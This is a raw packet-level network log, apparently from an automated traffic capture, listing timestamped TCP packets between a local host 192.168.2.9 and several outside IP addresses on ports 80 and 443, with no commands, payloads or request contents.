                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679800034 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679857016 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679907084 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679938078 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679939985 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.679972887 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680005074 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680011988 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680011988 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680039883 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680074930 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.680074930 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.682660103 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.682746887 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.683515072 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.683883905 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.684142113 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.684210062 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.684993982 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.685995102 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.686011076 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.686022043 CEST44349727162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.686084032 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.686084032 CEST49727443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689378023 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689455032 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689543962 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689615965 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689636946 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689655066 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689904928 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689938068 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689968109 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689973116 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.689987898 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.690006971 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.690052986 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697792053 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697859049 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697877884 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697892904 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697925091 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697938919 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.698476076 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.698540926 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.699220896 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.699275970 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.708158016 CEST49728443192.168.2.952.217.131.81
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.708195925 CEST4434972852.217.131.81192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.708259106 CEST49728443192.168.2.952.217.131.81
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.708796024 CEST49728443192.168.2.952.217.131.81
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.708810091 CEST4434972852.217.131.81192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.709680080 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.709794044 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.709988117 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710002899 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710017920 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710033894 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710041046 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710048914 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710067034 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710072041 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710072041 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710083008 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710105896 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710105896 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.710190058 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.720848083 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.720874071 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.720886946 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.720905066 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721010923 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721026897 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721029997 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721045017 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721048117 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721061945 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721082926 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721108913 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721126080 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721139908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721178055 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.721178055 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.723964930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724075079 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724090099 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724102974 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724107027 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724116087 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724124908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724133968 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724140882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724149942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724159956 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724167109 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724181890 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.724239111 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725327015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725353956 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725368977 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725375891 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725392103 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725438118 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725541115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725557089 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725570917 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725588083 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725588083 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725610018 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.725792885 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730520010 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730554104 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730576992 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730586052 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730591059 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730624914 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730634928 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730668068 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730674982 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730700016 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730710983 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730734110 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730740070 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730766058 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730777025 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730798960 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730806112 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730842113 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730849028 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730881929 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730914116 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730926991 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730947018 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730957031 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730982065 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.730990887 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731020927 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731134892 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731168032 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731199026 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731201887 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731219053 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731235027 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731246948 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731267929 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731276035 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731302977 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731311083 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731349945 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731475115 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731508970 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731542110 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731575012 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731575966 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731585026 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731609106 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731615067 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731645107 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731653929 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731692076 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731698036 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731734991 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731756926 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731770992 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731780052 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731800079 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.731817007 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732048988 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732053041 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732089043 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732120037 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732120991 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732135057 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732153893 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732186079 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732203007 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732234001 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732238054 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732270956 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732285023 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732302904 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732315063 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732336044 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732368946 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732368946 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732377052 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732415915 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732419968 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732453108 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732465982 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732500076 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732562065 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732592106 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732611895 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732625008 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732636929 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732662916 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732677937 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732714891 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732724905 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732748032 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732758045 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732780933 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732784033 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732815981 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732824087 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732851028 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732861996 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732882977 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732913017 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732947111 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732947111 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732958078 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732979059 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.732990980 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733031034 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733031034 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733063936 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733078957 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733094931 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733104944 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733128071 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733139992 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733158112 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733171940 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733189106 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733206987 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733241081 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733242035 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733294010 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733311892 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733345032 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733345985 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733378887 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733393908 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733414888 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733421087 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733445883 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733458042 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733479023 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733491898 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733511925 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733522892 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733556032 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733546019 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733622074 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733639956 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733686924 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733751059 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733798981 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733815908 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733858109 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733858109 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733887911 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733903885 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733921051 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733930111 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733971119 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.733972073 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734004021 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734015942 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734039068 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734049082 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734071016 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734085083 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734103918 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734112024 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734138012 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734143019 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734181881 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734602928 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734658957 CEST4970880192.168.2.9147.45.44.104
